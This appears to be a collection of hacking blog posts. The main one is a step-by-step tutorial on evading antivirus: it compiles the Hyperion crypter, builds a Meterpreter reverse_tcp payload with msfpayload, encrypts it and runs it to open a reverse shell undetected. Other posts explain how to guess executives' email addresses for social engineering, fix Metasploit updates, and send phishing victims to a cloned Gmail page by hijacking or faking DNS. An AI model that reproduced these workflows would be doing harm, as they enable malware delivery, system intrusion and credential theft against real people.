Bypassing Antivirus with PE Crypters

Well most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.

I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.

On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.

Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf)

Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.

Next Download the project;
or use: wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip









Unzip It. 
unzip Hyperion-1.0.zip






















Change the directory, and compile it.
cd Hyperion-1.0.zip
wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe



Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.4
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe



Scan it. 
Once the payload is ready, we will scan it first (without crypting).



Lets Crypt it with Hyperion.
wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe
ls -l



Scan it.
No Detection



Execute it.
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.




Enjoy It.
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.



I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)

 You can learn Ehtical Hacking from the Infosec Institute, one of the leading institute in the field of Information Security training:  http://www.infosecinstitute.com/courses/ethical_hacking_training.html

Learn Android Pentesting Part 1 From this resource: http://resources.infosecinstitute.com/android-application-security-testing-guide-part-1/




Contact the CEO of a company with a social approach.

Most of the time when you will send a mail to info@anycompany.com, believe me there are very less number of chances that you will get a good response. Reason being as simple as the number of bounces which you email will get until it reaches the right person. So why not send it directly to the targeted person.

Making my words straighter, don’t you think writing this mail directly to the CEO of that company will do some good? 

I was going through some chrome extensions and got something which can help this deed. Yeah, we can go ahead and get the EMAIL ID of a CEO directly without any co-operation from any Living Body.

So for doing this, you have to count on me (only for about 5 minutes) and do what i say. 
1.   Find out the Person: Go to the site of that company and find out whom you have to deal with, i.e. the person whose email id you will find out. If you are unlucky, you may not get anything. Don't loose hope. Go to Google and give some commands at its search bar. Within in a short span of time, you will hold the name of person whom you have to target. 
2.  Use Rapportive: We will be using Rapportive extension for Reverse Engineering the work, so load your browser with this extension.
3.  Integrate it with Gmail: Once you have installed Rapportive, open Gmail in a new tab and you will see a "rapportive" link coming on your screen.


You can also integrate it with other your other Social Accounts.


 

Reverse Engineer the Email IDs: Finally we have to check out some common combinations like firstname.L@company.com, firstname@company.com, firstname.lastname@company.com, firstname.LE@company.com, f.lastname@company.com. As you will try, you will get the following two responses:

Example: Rapportive Profile Not Found


Example: Rapportive Profile Found

Once you have this, you had got their twitter and other accounts. But the story doesn’t ends up here. For these accounts, you also need to verify them. If it is a twitter account, check the number of their followers. If the profile seems to be active and connections are more than 400, then is must be fine. Reason why I am putting down emphasis on twitter; if you mention anything with @their_twitter_name, it will give a direct notification to them.

Similarly for their LinkedIn account, if they have less than 500 connections that may raise points of issues for whether they use it properly or not? Moreover, whether they accept connections or not?

Google Account can be checked similarly too with the working status of the profile. Sometimes, even phone number is found but don’t get greedy. Don’t make a call until you are a good Social Engineer.

So, with this stuff, I will wish u Best of luck mates. I hope you are not going to mess up.

Msfupdate not working with "no version information available" error.


A few days back while working with my testings and research, i came across an error which was continously depriving me of updating my metasploit framework. Error message was something like this :

(Click on Image to Enlarge)

No version available and blah blah blah. For that, i ignored it for a couple of days due to workload and downloaded exploits manually. But when it seemed kiddish to me, i got into roots. I soon realized that the "no version information available" error , here, meant that the library metasploit does not have a version to refer and hence it is not updating to any further version. Was quite kiddish, but realistic too. So i checked its libraries :

(Click on Image to Enlarge)

libssl.so.0.9.8 do not have a link to /usr/lib/ where as the entire library actually relies on the same. So what we need to do is : 
Backup the library that is erroring msf.
Create a link between the library msf and /usr/lib/

Do this : 

(Click on Image to Enlarge)

Once you are done with all this stuff, go ahead and update your metasploit. You will get a smile on your face.

(Click on Image to Enlarge)

So this was how you dont need to put back your actions if you get any error anywhere, just like in case of msf. 

Enjoy hacking, enjoy exploitation. :)


Email Hacking using Credential Harvester Attack (SET)

Learn how to write your own hacking tools in python:



This video covers the Credential Harvester Attack of Social Engineering Toolkit, which is basically used for making an Automated clone and get credentials of the victim.

I had done it with a small setup of One machine with backtrack installed and other one being XP as the victim.


However a small issue comes with it. Why the victim will open your IP? 

Well simple, get into the DNS server, or create a fake DNS server and DHCP, and start giving IP with your own authorization. Once you are done with fake DNS, make a fake entry for gmail.com poting to your Fake IP address. 

In case any issue comes in between, feel free to contact me at upgoingstaar@gmail.com :)

Stay Focused, Keep Hacking.